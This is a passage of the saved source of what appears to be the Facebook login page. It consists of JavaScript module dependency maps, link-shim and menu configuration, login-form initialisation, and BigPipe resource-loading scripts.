"Dcggo", "7Es1F", "QwEwe", "iXgW2", "Vl2QP", "TYks2", "k9BMX", "eeYF5",
"81DSB", "ZwXRt", "EAoOu"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"]
},
"be": 1
},
"QuickSandSolver": {
"r": ["dAiGV", "+ClWy", "IqnzN", "7Es1F", "8ELCB", "XS1eF", "eeYF5", "EAoOu"],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"],
"r": ["b\/C9s"]
},
"be": 1
},
"ConfirmationDialog": {
"r": ["dAiGV", "IqnzN", "oE4Do", "eeYF5"],
"be": 1
},
"BanzaiScuba_DEPRECATED": {
"r": ["dAiGV", "IqnzN", "b\/C9s", "EAoOu"],
"rds": {
"m": ["BanzaiScuba_DEPRECATED"]
}
},
"BladeRunnerClient": {
"r": ["upr+L", "885v5", "IqnzN", "Y4Pxs", "b\/C9s", "7Es1F", "9OX9e", "EAoOu"],
"rds": {
"m": ["MqttLongPollingRunner", "BanzaiScuba_DEPRECATED"],
"r": ["dAiGV"]
},
"be": 1
},
"BladeRunnerStreamHandler": {
"r": ["7Es1F"],
"be": 1
},
"VisualCompletionGating": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "Dnrgo", "EAoOu"],
"rds": {
"m": ["BanzaiScuba_DEPRECATED"]
}
},
"FbtLogging": {
"r": ["dAiGV"]
},
"IntlQtEventFalcoEvent": {
"r": ["dAiGV", "IqnzN", "b\/C9s", "EAoOu"],
"rds": {
"m": ["BanzaiScuba_DEPRECATED"]
}
},
"ODS": {
"r": ["IqnzN", "b\/C9s", "EAoOu"],
"rds": {
"m": ["BanzaiScuba_DEPRECATED"],
"r": ["dAiGV"]
},
"be": 1
},
"AsyncSignal": {
"r": ["IqnzN"],
"be": 1
},
"Dock": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "TYks2", "eeYF5"],
"be": 1
},
"WebSpeedInteractionsTypedLogger": {
"r": ["q2faU", "upr+L", "IqnzN", "b\/C9s", "EAoOu"],
"rds": {
"m": ["BanzaiScuba_DEPRECATED"],
"r": ["dAiGV"]
},
"be": 1
},
"DOM": {
"r": ["IqnzN", "eeYF5"],
"be": 1
},
"Form": {
"r": ["dAiGV", "IqnzN", "eeYF5"],
"be": 1
},
"FormSubmit": {
"r": ["dAiGV", "IqnzN", "VK0qH", "eeYF5", "EAoOu"],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"],
"r": ["b\/C9s"]
},
"be": 1
},
"Input": {
"r": ["dAiGV"],
"be": 1
},
"Live": {
"r": ["IqnzN", "2\/maQ", "ylVec", "eeYF5"],
"be": 1
},
"Toggler": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "TYks2", "eeYF5"],
"be": 1
},
"Tooltip": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "Dcggo", "\/8Wbb", "TYks2", "eeYF5",
"ZwXRt", "EAoOu"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "PageTransitions",
"BanzaiScuba_DEPRECATED", "Animation"
],
"r": ["ICEKG"]
},
"be": 1
},
"URI": {
"r": [],
"be": 1
},
"trackReferrer": {
"r": [],
"rds": {
"m": ["BanzaiScuba_DEPRECATED"],
"r": ["dAiGV", "IqnzN", "b\/C9s", "EAoOu"]
},
"be": 1
},
"PhotoTagApproval": {
"r": ["IqnzN", "abWGO", "\/mnVq", "eeYF5"],
"be": 1
},
"PhotoSnowlift": {
"r": ["nhlJH", "dAiGV", "UMyRo", "klr3O", "+TgpX", "KbYEx", "G9cPc", "3+lS7",
"z0dct", "upr+L", "kw\/60", "fjidr", "0KDUP", "+PUle", "IqnzN",
"4l\/Jz", "liI1q", "j2PT4", "b\/C9s", "Dcggo", "7Es1F", "7yHBQ",
"\/8Wbb", "kGJ3F", "QwEwe", "Vl2QP", "9OX9e", "PkNK5", "arqLm", "TYks2",
"DG7Ii", "wzs1q", "Etm\/I", "k9BMX", "nkqsr", "QQNFB", "yfgo6", "zAb0r",
"eeYF5", "ylVec", "o6Irt", "G0xtD", "W2HPr", "YD\/ol", "abWGO", "81DSB",
"OGJba", "opLOF", "ZwXRt", "ICEKG", "EAoOu"
],
"rds": {
"m": ["Animation", "VisualCompletionGating", "FbtLogging",
"IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED", "PageTransitions"
],
"r": ["Dnrgo"]
},
"be": 1
},
"PhotoTagger": {
"r": ["nhlJH", "gcDYl", "dAiGV", "ZtSVE", "UMyRo", "klr3O", "KbYEx", "G9cPc",
"Y+gbl", "3+lS7", "upr+L", "\/Hfxd", "kU0Y2", "kw\/60", "vD6gn",
"fjidr", "vb6jB", "0KDUP", "p6v7l", "KFvsj", "+PUle", "IqnzN", "4l\/Jz",
"j2PT4", "3wbX4", "FYMSp", "Wmp8H", "b\/C9s", "Dcggo", "IL7RH", "7Es1F",
"7yHBQ", "\/8Wbb", "WeUAK", "QwEwe", "PoxYZ", "CWj+p", "NVC4W", "M4wDl",
"PkNK5", "arqLm", "TYks2", "hFeSh", "pb+f9", "KrT1e", "SUmGJ", "wzs1q",
"Etm\/I", "k9BMX", "XoZXj", "nkqsr", "QQNFB", "CPsJs", "yfgo6", "yEGNH",
"fqMQ+", "8N6zt", "eeYF5", "ylVec", "elJXs", "o6Irt", "5JIiC", "W2HPr",
"Le2KY", "abWGO", "AZAh4", "81DSB", "46DeS", "thkqN", "G\/F7M", "opLOF",
"ZwXRt", "9OX9e", "ICEKG", "Z9sAJ", "pBquy", "4QSOX", "Vl2QP", "EAoOu"
],
"rdfds": {
"m": ["GamesVideoDeleteCommentDialog.react",
"GamesVideoModerationRulesNux.react",
"GamesVideoCommentRemovedDialog.react"
],
"r": ["3zFt6", "wWSAV", "DxHlI", "HlSPQ", "G0xtD"]
},
"rds": {
"m": ["PresenceStatus", "FbtLogging", "IntlQtEventFalcoEvent",
"BanzaiScuba_DEPRECATED", "Animation", "PageTransitions",
"LynxAsyncCallbackFalcoEvent", "CometSuspenseFalcoEvent"
],
"r": ["885v5"]
},
"be": 1
},
"PhotoTags": {
"r": ["IqnzN", "b\/C9s", "abWGO", "\/mnVq", "eeYF5"],
"be": 1
},
"TagTokenizer": {
"r": ["nhlJH", "dAiGV", "KbYEx", "kU0Y2", "IqnzN", "vJ9N2", "b\/C9s", "8qfyn",
"kWFQV", "eeYF5", "fE7rj", "81DSB", "\/mnVq", "EAoOu"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"]
},
"be": 1
},
"AsyncDialog": {
"r": ["dAiGV", "klr3O", "KbYEx", "upr+L", "IqnzN", "4l\/Jz", "b\/C9s", "Dcggo",
"QwEwe", "TYks2", "eeYF5", "81DSB", "ZwXRt", "EAoOu", "9OX9e"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"]
},
"be": 1
},
"Hovercard": {
"r": ["dAiGV", "KbYEx", "kU0Y2", "KFvsj", "IqnzN", "Wmp8H", "b\/C9s", "Dcggo",
"7Es1F", "\/8Wbb", "TYks2", "hFeSh", "eeYF5", "81DSB", "ZwXRt", "9OX9e",
"EAoOu"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED",
"PageTransitions", "Animation"
],
"r": ["ICEKG"]
},
"be": 1
},
"XSalesPromoWWWDetailsDialogAsyncController": {
"r": ["gWMJg"],
"be": 1
},
"XOfferController": {
"r": ["hIek+"],
"be": 1
},
"PerfXSharedFields": {
"r": ["IqnzN"],
"be": 1
},
"KeyEventTypedLogger": {
"r": ["upr+L", "IqnzN", "b\/C9s", "Gj8v9", "EAoOu"],
"rds": {
"m": ["BanzaiScuba_DEPRECATED"],
"r": ["dAiGV"]
},
"be": 1
},
"QPLInspector": {
"r": ["VvVFw"],
"be": 1
},
"ReactDOM": {
"r": ["IqnzN", "ZwXRt", "9OX9e", "eeYF5"],
"be": 1
},
"Animation": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "eeYF5"]
},
"PageTransitions": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "ICEKG", "eeYF5", "EAoOu", "ZwXRt"],
"rds": {
"m": ["Animation", "PageTransitions", "FbtLogging", "IntlQtEventFalcoEvent",
"BanzaiScuba_DEPRECATED"
]
}
},
"ContextualLayerInlineTabOrder": {
"r": ["KbYEx", "IqnzN", "b\/C9s", "Dnrgo", "hFeSh", "eeYF5"],
"be": 1
},
"XUIDialogButton.react": {
"r": ["klr3O", "KbYEx", "upr+L", "IqnzN", "4l\/Jz", "b\/C9s", "Dcggo", "Vl2QP",
"TYks2", "81DSB", "eeYF5", "ZwXRt", "EAoOu"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"],
"r": ["dAiGV"]
},
"be": 1
},
"XUIDialogBody.react": {
"r": ["KbYEx", "IqnzN", "Vl2QP", "TYks2", "k9BMX", "ZwXRt"],
"be": 1
},
"XUIDialogFooter.react": {
"r": ["dAiGV", "KbYEx", "IqnzN", "Vl2QP", "TYks2", "k9BMX", "81DSB", "ZwXRt"],
"be": 1
},
"XUIDialogTitle.react": {
"r": ["dAiGV", "klr3O", "KbYEx", "upr+L", "IqnzN", "4l\/Jz", "b\/C9s", "Dcggo",
"TYks2", "eeYF5", "ZwXRt", "EAoOu"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"]
},
"be": 1
},
"XUIGrayText.react": {
"r": ["KbYEx", "IqnzN", "Vl2QP", "TYks2", "k9BMX", "ZwXRt"],
"be": 1
},
"DialogX": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "Dcggo", "QwEwe", "TYks2", "eeYF5",
"EAoOu"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"]
},
"be": 1
},
"React": {
"r": ["IqnzN", "ZwXRt"],
"be": 1
}
}
})
});
</script>
<script>
requireLazy(["InitialJSLoader"], function (InitialJSLoader) {
InitialJSLoader.loadOnDOMContentReady(["dAiGV", "ICEKG", "IqnzN", "KbYEx", "b\/C9s", "Dnrgo",
"upr+L", "EAoOu", "\/8Wbb", "ZwXRt", "9OX9e", "P\/mr5"
]);
});
</script>
<script>
requireLazy(["TimeSliceImpl", "ServerJS"], function (TimeSlice, ServerJS) {
var s = (new ServerJS());
s.handle({
"define": [
["LinkshimHandlerConfig", [], {
"supports_meta_referrer": true,
"default_meta_referrer_policy": "origin-when-crossorigin",
"switched_meta_referrer_policy": "origin",
"non_linkshim_lnfb_mode": null,
"link_react_default_hash": "AT2HzbyAKrDaO2zdD3OU4je4cz94feHl1mCKYr_1DytPS7NeiA3Z3reIAmOewL_pA22s0Ep2wZ8ZZb2z4-lWVGl9y9UynlBQqt3uIdMSJ0KbZWli9SqOg3oDTqTcchU4Q0c2jV1iqxKMaoblPDms",
"untrusted_link_default_hash": "AT1nUEPHULWnXdcsx4p4tg1jpUnePn7Dz0zzwUDubCQUr5TGyw5W_dBVdTFmdi8JbO7tgc64NsrVUaJH5urnbyz7urWQRly99fziqa2dUtkFWgqn4v-moukmI_jzEt3_vSkFeu_kV5PwqQComhxH",
"linkshim_host": "l.facebook.com",
"linkshim_path": "\/l.php",
"linkshim_enc_param": "h",
"linkshim_url_param": "u",
"use_rel_no_opener": true,
"always_use_https": true,
"onion_always_shim": true,
"middle_click_requires_event": true,
"www_safe_js_mode": "asynclazy",
"m_safe_js_mode": "MLynx_asynclazy",
"ghl_param_link_shim": false,
"click_ids": [],
"is_linkshim_supported": true,
"current_domain": "facebook.com",
"blocklisted_domains": ["ad.doubleclick.net",
"ads-encryption-url-example.com", "bs.serving-sys.com",
"ad.atdmt.com"
]
}, 27]
],
"instances": [
["__inst_5b4d0c00_0_0_7N", ["Menu", "XUIMenuWithSquareCorner", "XUIMenuTheme"],
[
[], {
"id": "u_0_0_Ql",
"behaviors": [{
"__m": "XUIMenuWithSquareCorner"
}],
"theme": {
"__m": "XUIMenuTheme"
}
}
], 2
],
["__inst_5b4d0c00_0_1_tJ", ["Menu", "MenuItem", "__markup_3310c079_0_0_3c",
"HTML", "__markup_3310c079_0_1_FZ", "__markup_3310c079_0_2_1P",
"__markup_3310c079_0_3_ou", "XUIMenuWithSquareCorner", "XUIMenuTheme"
],
[
[{
"value": "key_shortcuts",
"ctor": {
"__m": "MenuItem"
},
"markup": {
"__m": "__markup_3310c079_0_0_3c"
},
"label": "Keyboard shortcut help...",
"title": "",
"className": null
}, {
"href": "\/help\/accessibility",
"target": "_blank",
"value": "help_center",
"ctor": {
"__m": "MenuItem"
},
"markup": {
"__m": "__markup_3310c079_0_1_FZ"
},
"label": "Accessibility Help Centre",
"title": "",
"className": null
}, {
"href": "\/help\/contact\/accessibility",
"target": "_blank",
"value": "submit_feedback",
"ctor": {
"__m": "MenuItem"
},
"markup": {
"__m": "__markup_3310c079_0_2_1P"
},
"label": "Submit feedback",
"title": "",
"className": null
}, {
"href": "\/accessibility",
"target": "_blank",
"value": "facebook_page",
"ctor": {
"__m": "MenuItem"
},
"markup": {
"__m": "__markup_3310c079_0_3_ou"
},
"label": "Updates from Facebook Accessibility",
"title": "",
"className": null
}], {
"id": "u_0_1_GB",
"behaviors": [{
"__m": "XUIMenuWithSquareCorner"
}],
"theme": {
"__m": "XUIMenuTheme"
}
}
], 2
],
["__inst_e5ad243d_0_0_0Y", ["PopoverMenu", "__inst_1de146dc_0_1_6X",
"__elem_ec77afbd_0_1_9V", "__inst_5b4d0c00_0_1_tJ"
],
[{
"__m": "__inst_1de146dc_0_1_6X"
}, {
"__m": "__elem_ec77afbd_0_1_9V"
}, {
"__m": "__inst_5b4d0c00_0_1_tJ"
},
[]
], 2
],
["__inst_e5ad243d_0_1_yC", ["PopoverMenu", "__inst_1de146dc_0_0_fF",
"__elem_ec77afbd_0_0_hn", "__inst_5b4d0c00_0_0_7N"
],
[{
"__m": "__inst_1de146dc_0_0_fF"
}, {
"__m": "__elem_ec77afbd_0_0_hn"
}, {
"__m": "__inst_5b4d0c00_0_0_7N"
},
[]
], 2
],
["__inst_1de146dc_0_0_fF", ["Popover", "__elem_1de146dc_0_0_g2",
"__elem_ec77afbd_0_0_hn", "ContextualLayerAutoFlip",
"ContextualDialogArrow"
],
[{
"__m": "__elem_1de146dc_0_0_g2"
}, {
"__m": "__elem_ec77afbd_0_0_hn"
},
[{
"__m": "ContextualLayerAutoFlip"
}, {
"__m": "ContextualDialogArrow"
}], {
"alignh": "left",
"position": "below"
}
], 2
],
["__inst_1de146dc_0_1_6X", ["Popover", "__elem_1de146dc_0_1_Wh",
"__elem_ec77afbd_0_1_9V", "ContextualLayerAutoFlip",
"ContextualDialogArrow"
],
[{
"__m": "__elem_1de146dc_0_1_Wh"
}, {
"__m": "__elem_ec77afbd_0_1_9V"
},
[{
"__m": "ContextualLayerAutoFlip"
}, {
"__m": "ContextualDialogArrow"
}], {
"alignh": "right",
"position": "below"
}
], 2
]
],
"markup": [
["__markup_3310c079_0_0_3c", {
"__html": "Keyboard shortcut help..."
}, 1],
["__markup_3310c079_0_1_FZ", {
"__html": "Accessibility Help Centre"
}, 1],
["__markup_3310c079_0_2_1P", {
"__html": "Submit feedback"
}, 1],
["__markup_3310c079_0_3_ou", {
"__html": "Updates from Facebook Accessibility"
}, 1]
],
"elements": [
["__elem_a588f507_0_1_7C", "u_0_3_AK", 1],
["__elem_3fc3da18_0_0_ZB", "u_0_4_Kj", 1],
["__elem_51be6cb7_0_0_bN", "u_0_5_wJ", 1],
["__elem_1de146dc_0_0_g2", "u_0_6_s3", 1],
["__elem_ec77afbd_0_0_hn", "u_0_7_8g", 2],
["__elem_1de146dc_0_1_Wh", "u_0_8_\/Z", 1],
["__elem_ec77afbd_0_1_9V", "u_0_9_9G", 2],
["__elem_a588f507_0_0_bd", "globalContainer", 2],
["__elem_a588f507_0_2_U6", "content", 1],
["__elem_835c633a_0_0_aI", "u_0_a_\/N", 1],
["__elem_a588f507_0_3_lO", "u_0_b_9E", 1],
["__elem_a588f507_0_4_JU", "u_0_c_Ba", 1],
["__elem_45d73b5d_0_0_pr", "u_0_d_zR", 1]
],
"require": [
["WebPixelRatioDetector", "startDetecting", [],
[false]
],
["ServiceWorkerLoginAndLogout", "login", [],
[]
],
["ScriptPath", "set", [],
["\/", "a6bebc6e", {
"imp_id": "0NyOLcpHWD1fjNZeF",
"ef_page": null,
"uri": "https:\/\/www.facebook.com\/"
}]
],
["UITinyViewportAction", "init", [],
[]
],
["ResetScrollOnUnload", "init", ["__elem_a588f507_0_0_bd"],
[{
"__m": "__elem_a588f507_0_0_bd"
}]
],
["AccessibilityWebVirtualCursorClickLogger", "init", ["__elem_a588f507_0_0_bd"],
[
[{
"__m": "__elem_a588f507_0_0_bd"
}]
]
],
["KeyboardActivityLogger", "init", [],
[]
],
["FocusRing", "init", [],
[]
],
["ErrorMessageConsole", "listenForUncaughtErrors", [],
[]
],
["HardwareCSS", "init", [],
[]
],
["NavigationAssistantController", "init", ["__elem_3fc3da18_0_0_ZB",
"__elem_51be6cb7_0_0_bN", "__inst_5b4d0c00_0_0_7N",
"__inst_5b4d0c00_0_1_tJ", "__inst_e5ad243d_0_0_0Y",
"__inst_e5ad243d_0_1_yC"
],
[{
"__m": "__elem_3fc3da18_0_0_ZB"
}, {
"__m": "__elem_51be6cb7_0_0_bN"
}, {
"__m": "__inst_5b4d0c00_0_0_7N"
}, {
"__m": "__inst_5b4d0c00_0_1_tJ"
}, null, {
"accessibilityPopoverMenu": {
"__m": "__inst_e5ad243d_0_0_0Y"
},
"globalPopoverMenu": null,
"sectionsPopoverMenu": {
"__m": "__inst_e5ad243d_0_1_yC"
}
}]
],
["__inst_e5ad243d_0_1_yC"],
["__inst_1de146dc_0_0_fF"],
["__inst_e5ad243d_0_0_0Y"],
["__inst_1de146dc_0_1_6X"],
["IntlUtils"],
["LoginFormToggle", "initPasswordToggle", ["__elem_a588f507_0_3_lO",
"__elem_a588f507_0_4_JU"
],
[{
"__m": "__elem_a588f507_0_3_lO"
}, {
"__m": "__elem_a588f507_0_4_JU"
}]
],
["LoginFormController", "init", ["__elem_835c633a_0_0_aI",
"__elem_45d73b5d_0_0_pr"
],
[{
"__m": "__elem_835c633a_0_0_aI"
}, {
"__m": "__elem_45d73b5d_0_0_pr"
}, null, true, {
"pubKey": {
"publicKey": "767fcc6d000bb31d7669c7cba603fe55dc052e574142bd1d413f7e1183170441",
"keyId": 79
}
}]
],
["BrowserPrefillLogging", "initContactpointFieldLogging", [],
[{
"contactpointFieldID": "email",
"serverPrefill": ""
}]
],
["BrowserPrefillLogging", "initPasswordFieldLogging", [],
[{
"passwordFieldID": "pass"
}]
],
["FocusListener"],
["FlipDirectionOnKeypress"],
["FBLynx", "setupDelegation", [],
[]
],
["Animation"],
["PageTransitions"],
["RequireDeferredReference", "unblock", [],
[
["BanzaiScuba_DEPRECATED", "Animation", "FbtLogging",
"IntlQtEventFalcoEvent", "PageTransitions"
]
]
],
["TimeSliceImpl"],
["HasteSupportData"],
["ServerJS"],
["Run"],
["InitialJSLoader"]
],
"contexts": [
[{
"__m": "__elem_a588f507_0_1_7C"
}, true],
[{
"__m": "__elem_a588f507_0_2_U6"
}, true]
]
});
requireLazy(["Run"], function (Run) {
Run.onAfterLoad(function () {
s.cleanup(TimeSlice)
})
});
});
onloadRegister_DEPRECATED(function () {
useragentcm();
});
</script>
<script>
now_inl = (function () {
var p = window.performance;
return p && p.now && p.timing && p.timing.navigationStart ? function () {
return p.now() + p.timing.navigationStart
} : function () {
return new Date().getTime()
};
})();
window.__bigPipeFR = now_inl();
</script>
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/asXbW0EF74d.css?_nc_x=Ij3Wp8lg5Kz"
as="style" crossorigin="anonymous" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/rshiL2tOkCG.css?_nc_x=Ij3Wp8lg5Kz"
as="style" crossorigin="anonymous" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/HPXapuc0p5v.css?_nc_x=Ij3Wp8lg5Kz"
as="style" crossorigin="anonymous" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/sBZ6cM2f6IJ.css?_nc_x=Ij3Wp8lg5Kz"
as="style" crossorigin="anonymous" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/kDQHM2iUCTj.css?_nc_x=Ij3Wp8lg5Kz"
as="style" crossorigin="anonymous" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0,cross/J-keP3TYvXv.css?_nc_x=Ij3Wp8lg5Kz"
as="style" crossorigin="anonymous" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3ij9m4/yE/l/en_GB/f9Mv4y9tivm.js?_nc_x=Ij3Wp8lg5Kz"
as="script" crossorigin="anonymous" nonce="nHhiRPia" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/BnlqXcznuVX.js?_nc_x=Ij3Wp8lg5Kz" as="script"
crossorigin="anonymous" nonce="nHhiRPia" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/iWbQtMrJW8n.css?_nc_x=Ij3Wp8lg5Kz"
as="style" crossorigin="anonymous" />
<link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/fnvypMQ2hR1.js?_nc_x=Ij3Wp8lg5Kz" as="script"
crossorigin="anonymous" nonce="nHhiRPia" />
<script>
window.__bigPipeCtor = now_inl();
requireLazy(["BigPipe"], function (BigPipe) {
define("__bigPipe", [], window.bigPipe = new BigPipe({
"forceFinish": true,
"config": {
"flush_pagelets_asap": true,
"dispatch_pagelet_replayable_actions": false
}
}));
});
</script>
<script nonce="nHhiRPia">
(function () {
var n = now_inl();
requireLazy(["__bigPipe"], function (bigPipe) {
bigPipe.beforePageletArrive("first_response", n);
})
})();
</script>
<script nonce="nHhiRPia">
requireLazy(["__bigPipe"], (function (bigPipe) {
bigPipe.onPageletArrive({
displayResources: ["KrT1e", "Ouygn", "eeYF5", "81DSB", "TYks2", "RtFLV", "IqnzN",
"b/C9s", "4l/Jz", "P/mr5", "EAoOu"
],
id: "first_response",
phase: 0,
last_in_phase: true,
tti_phase: 0,
all_phases: [63],
hsrp: {
hblp: {
sr_revision: 1003448310,
consistency: {
rev: 1003448310
}
}
},
allResources: ["KrT1e", "dAiGV", "ICEKG", "IqnzN", "Ouygn", "eeYF5", "81DSB",
"KbYEx", "b/C9s", "TYks2", "Dnrgo", "upr+L", "EAoOu", "RtFLV", "4l/Jz",
"P/mr5", "/8Wbb", "ZwXRt", "9OX9e"
]
});
}));
</script>
<script>
requireLazy(["__bigPipe"], function (bigPipe) {
bigPipe.setPageID("6939598592736256614-0")
});
CavalryLogger.setPageID("6939598592736256614-0");
</script>
<script nonce="nHhiRPia">
(function () {
var n = now_inl();
requireLazy(["__bigPipe"], function (bigPipe) {
bigPipe.beforePageletArrive("last_response", n);
})
})();
</script>
<script nonce="nHhiRPia">
requireLazy(["__bigPipe"], (function (bigPipe) {
bigPipe.onPageletArrive({
displayResources: ["b/C9s"],
id: "last_response",
phase: 63,
last_in_phase: true,
the_end: true,
jsmods: {
define: [
["UACMConfig", [], {
ffver: 32490,
ffid1: "AcHnYpZZeBwD-sRLuo9Gr_Xj5l-FtZG6luFEL6uv7g8_r5Y0ayXaT2WAAHAhw9GDY2Q",
ffid2: "AcHFBUn9nQQVPB3un8TQAwfT8wY2bRruJR-X4RH_hHeHnDIw5BFH8hSfgYmdVUE9MFk",
ffid3: "AcGR75dU_oJYVpqQL3JZcl_v0va2YsijGGl8mo09jeW9ljqh_N2FV_J0coZkvzS_x3qu9fsLQdATtZPFNjyvyk8T",
ffid4: "AcFL8ekybYl6iK71MfVBavrw58hIUfGgy1XxAAsAh1zDS0BRNpxu09mCiV7X56C187I"
}, 308],
["TimeSliceInteractionSV", [], {
on_demand_reference_counting: true,
on_demand_profiling_counters: true,
default_rate: 1000,
lite_default_rate: 100,
interaction_to_lite_coinflip: {
ADS_INTERFACES_INTERACTION: 0,
ads_perf_scenario: 0,
ads_wait_time: 0,
Event: 1
},
interaction_to_coinflip: {
ADS_INTERFACES_INTERACTION: 1,
ads_perf_scenario: 1,
ads_wait_time: 1,
Event: 100
},
enable_heartbeat: true,
maxBlockMergeDuration: 0,
maxBlockMergeDistance: 0,
enable_banzai_stream: true,
user_timing_coinflip: 50,
banzai_stream_coinflip: 0,
compression_enabled: true,
ref_counting_fix: false,
ref_counting_cont_fix: false,
also_record_new_timeslice_format: false,
force_async_request_tracing_on: false
}, 2609],
["cr:1458113", [], {
__rc: [null,
"Aa099LqjbKnpRvYSmElTAKGX1PY3RTV3qIKlLmmcjRZert8BN51OHJR2TBQ0v3tXD2ouNYa_b0V1RaEOfJURYgNcB48rRjg"
]
}, -1],
["cr:917439", ["PageTransitionsBlue"], {
__rc: ["PageTransitionsBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1108857", [], {
__rc: [null,
"Aa3GOso4viAA_D0sVBtj1nIXUuwP_bBsIUgek7i0CJelbwHsU1DstN0HtW9d6C0eh6DHX_MFctb1u1e59w"
]
}, -1],
["cr:1269707", [], {
__rc: [null,
"Aa0f4__HnMAGqXHrBgYaxQO_z1uDKNVMX88de26zPfs6Wxe2XEIUPO41ZAGa5bsRwWqk_TiejBnDaqCwSKxPsYM"
]
}, -1],
["cr:1269708", [], {
__rc: [null,
"Aa0f4__HnMAGqXHrBgYaxQO_z1uDKNVMX88de26zPfs6Wxe2XEIUPO41ZAGa5bsRwWqk_TiejBnDaqCwSKxPsYM"
]
}, -1],
["cr:1269709", [], {
__rc: [null,
"Aa0f4__HnMAGqXHrBgYaxQO_z1uDKNVMX88de26zPfs6Wxe2XEIUPO41ZAGa5bsRwWqk_TiejBnDaqCwSKxPsYM"
]
}, -1],
["cr:1294158", ["React.classic"], {
__rc: ["React.classic",
"Aa1YiqSPvOEa9yKoCs-Wl3leeqytI3xbwqIQPZEXbuSKMke82CRrkc_FQENCgqK_6xMpMZ--_XUEmr5175MYzZvpc8eS"
]
}, -1],
["cr:1294246", ["ReactDOM.classic"], {
__rc: ["ReactDOM.classic",
"Aa1YiqSPvOEa9yKoCs-Wl3leeqytI3xbwqIQPZEXbuSKMke82CRrkc_FQENCgqK_6xMpMZ--_XUEmr5175MYzZvpc8eS"
]
}, -1],
["cr:1069930", [], {
__rc: [null,
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1083116", ["XAsyncRequest"], {
__rc: ["XAsyncRequest",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1083117", [], {
__rc: [null,
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1697455", ["CookieConsentActionHandler"], {
__rc: ["CookieConsentActionHandler",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:888908", ["warningBlue"], {
__rc: ["warningBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:971473", ["LayerHideOnTransition"], {
__rc: ["LayerHideOnTransition",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1105154", [], {
__rc: [null,
"Aa3GOso4viAA_D0sVBtj1nIXUuwP_bBsIUgek7i0CJelbwHsU1DstN0HtW9d6C0eh6DHX_MFctb1u1e59w"
]
}, -1],
["PageTransitionsConfig", [], {
reloadOnBootloadError: true
}, 1067],
["CoreWarningGK", [], {
forceWarning: false
}, 725],
["cr:1292365", ["React-prod.classic"], {
__rc: ["React-prod.classic",
"Aa3GOso4viAA_D0sVBtj1nIXUuwP_bBsIUgek7i0CJelbwHsU1DstN0HtW9d6C0eh6DHX_MFctb1u1e59w"
]
}, -1],
["cr:1344485", ["ReactDOM.classic.prod-or-profiling"], {
__rc: ["ReactDOM.classic.prod-or-profiling",
"Aa3GOso4viAA_D0sVBtj1nIXUuwP_bBsIUgek7i0CJelbwHsU1DstN0HtW9d6C0eh6DHX_MFctb1u1e59w"
]
}, -1],
["cr:983844", [], {
__rc: [null,
"Aa3GOso4viAA_D0sVBtj1nIXUuwP_bBsIUgek7i0CJelbwHsU1DstN0HtW9d6C0eh6DHX_MFctb1u1e59w"
]
}, -1],
["cr:1344486", ["ReactDOM.classic.prod"], {
